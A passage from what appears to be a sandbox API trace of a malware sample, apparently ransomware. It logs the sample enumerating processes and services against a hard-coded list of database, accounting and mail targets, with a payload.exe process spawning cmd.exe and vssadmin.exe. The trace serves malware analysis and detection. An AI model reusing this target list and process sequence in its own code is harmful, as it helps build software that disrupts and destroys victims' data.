lpString2="svchost.exe") returned -1 [0266.197] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.197] lstrlenW (lpString="svchost.exe") returned 11 [0266.197] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.197] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.197] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.197] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.197] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.197] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.197] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.197] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.197] lstrlenW (lpString="svchost.exe") returned 11 [0266.197] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.197] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.197] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.197] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.197] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.198] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.198] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.198] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.198] lstrlenW (lpString="svchost.exe") returned 11 [0266.198] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.198] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.198] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.198] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.198] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.198] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.198] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.198] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0266.198] lstrlenW (lpString="audiodg.exe") returned 11 [0266.198] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0266.198] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0266.198] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0266.198] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0266.199] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0266.199] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0266.199] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.199] lstrlenW (lpString="svchost.exe") returned 11 [0266.199] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.199] lstrlenW (lpString="svchost.exe") returned 11 [0266.199] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0266.199] lstrlenW (lpString="userinit.exe") returned 12 [0266.199] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x348, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0266.200] lstrlenW (lpString="dwm.exe") returned 7 [0266.200] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0266.200] lstrlenW (lpString="explorer.exe") returned 12 [0266.200] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0266.200] lstrlenW (lpString="spoolsv.exe") returned 11 [0266.200] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0266.200] lstrlenW (lpString="taskhost.exe") returned 12 [0266.200] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.201] lstrlenW (lpString="svchost.exe") returned 11 [0266.201] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0266.201] lstrlenW (lpString="payload.exe") returned 11 [0266.201] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0266.201] lstrlenW (lpString="dllhost.exe") returned 11 [0266.201] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0266.202] lstrlenW (lpString="reader_sl.exe") returned 13 [0266.202] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x53c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0266.202] lstrlenW (lpString="cmd.exe") returned 7 [0266.202] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0266.202] lstrlenW (lpString="conhost.exe") returned 11 [0266.202] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x608, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0266.203] lstrlenW (lpString="vssadmin.exe") returned 12 [0266.203] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x608, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0266.203] CloseHandle (hObject=0x348) returned 1 [0266.203] Sleep (dwMilliseconds=0x1f4) [0266.786] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x43c06b0 [0266.861] EnumServicesStatusExW (in: hSCManager=0x43c06b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0266.862] GetLastError () returned 0xea [0266.862] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc9a) returned 0x57d8c0 [0266.862] EnumServicesStatusExW (in: hSCManager=0x43c06b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x57d8c0, cbBufSize=0xc9a, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x57d8c0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0266.863] CloseServiceHandle (hSCObject=0x43c06b0) returned 1 [0266.863] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0266.863] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0266.863] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0266.863] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0266.863] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0266.863] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0266.863] lstrlenW (lpString="AudioSrv") returned 8 [0266.863] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0266.863] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0266.863] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0266.863] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0266.863] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0266.863] lstrlenW (lpString="BFE") returned 3 [0266.863] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0266.863] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0266.863] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0266.863] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0266.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0266.864] lstrlenW (lpString="CryptSvc") returned 8 [0266.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0266.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0266.864] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0266.864] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0266.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0266.864] lstrlenW (lpString="CscService") returned 10 [0266.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0266.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0266.864] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0266.864] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0266.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0266.864] lstrlenW (lpString="DcomLaunch") returned 10 [0266.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0266.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0266.864] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0266.864] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0266.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0266.864] lstrlenW (lpString="Dhcp") returned 4 [0266.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0266.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0266.864] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0266.864] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0266.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0266.864] lstrlenW (lpString="Dnscache") returned 8 [0266.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0266.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0266.864] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0266.865] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0266.865] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0266.865] lstrlenW (lpString="DPS") returned 3 [0266.865] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0266.865] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0266.865] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0266.865] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0266.865] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0266.865] lstrlenW (lpString="eventlog") returned 8 [0266.865] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0266.865] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0266.865] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0266.865] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0266.865] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0266.865] lstrlenW (lpString="EventSystem") returned 11 [0266.865] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0266.865] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0266.865] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0266.865] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0266.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0266.866] lstrlenW (lpString="gpsvc") returned 5 [0266.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0266.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0266.866] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0266.866] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0266.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0266.866] lstrlenW (lpString="LanmanWorkstation") returned 17 [0266.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0266.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0266.866] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0266.866] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0266.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0266.866] lstrlenW (lpString="lmhosts") returned 7 [0266.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0266.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0266.866] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0266.866] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0266.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0266.866] lstrlenW (lpString="MMCSS") returned 5 [0266.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0266.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0266.866] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0266.866] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0266.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0266.866] lstrlenW (lpString="MpsSvc") returned 6 [0266.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0266.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0266.866] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0266.866] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0266.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0266.867] lstrlenW (lpString="NlaSvc") returned 6 [0266.867] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0266.867] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0266.867] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0266.867] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0266.867] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0266.867] lstrlenW (lpString="nsi") returned 3 [0266.867] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0266.867] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0266.867] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0266.867] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0266.867] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0266.867] lstrlenW (lpString="PcaSvc") returned 6 [0266.867] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0266.867] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0266.867] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0266.867] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0266.867] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0266.867] lstrlenW (lpString="PlugPlay") returned 8 [0266.867] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0266.867] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0266.867] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0266.867] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0266.867] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0266.867] lstrlenW (lpString="Power") returned 5 [0266.867] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0266.867] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0266.867] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0266.867] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0266.867] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0266.867] lstrlenW (lpString="ProfSvc") returned 7 [0266.867] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0266.868] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0266.868] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0266.868] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0266.868] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0266.868] lstrlenW (lpString="RpcEptMapper") returned 12 [0266.868] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0266.868] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0266.868] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0266.868] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0266.868] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0266.868] lstrlenW (lpString="RpcSs") returned 5 [0266.868] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0266.868] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0266.868] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0266.868] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0266.868] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0266.868] lstrlenW (lpString="SamSs") returned 5 [0266.868] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0266.868] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0266.868] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0266.868] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0266.868] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0266.868] lstrlenW (lpString="Schedule") returned 8 [0266.868] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0266.868] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0266.868] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0266.868] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0266.868] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0266.868] lstrlenW (lpString="SENS") returned 4 [0266.868] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0266.868] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0266.868] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0266.869] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0266.869] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0266.869] lstrlenW (lpString="ShellHWDetection") returned 16 [0266.869] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0266.869] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0266.869] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0266.869] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0266.869] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0266.869] lstrlenW (lpString="Spooler") returned 7 [0266.869] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0266.869] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0266.869] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0266.869] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0266.869] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0266.869] lstrlenW (lpString="Themes") returned 6 [0266.869] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0266.869] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0266.869] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0266.869] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0266.869] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0266.869] lstrlenW (lpString="UxSms") returned 5 [0266.869] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0266.869] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0266.869] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0266.869] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0266.869] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0266.869] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x57d8c0 | out: hHeap=0x520000) returned 1 [0266.869] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x348 [0266.871] Process32FirstW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.871] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0266.871] lstrlenW (lpString="System") returned 6 [0266.871] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0266.871] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0266.871] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0266.871] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0266.871] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0266.871] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0266.871] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0266.871] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0266.871] lstrlenW (lpString="smss.exe") returned 8 [0266.871] 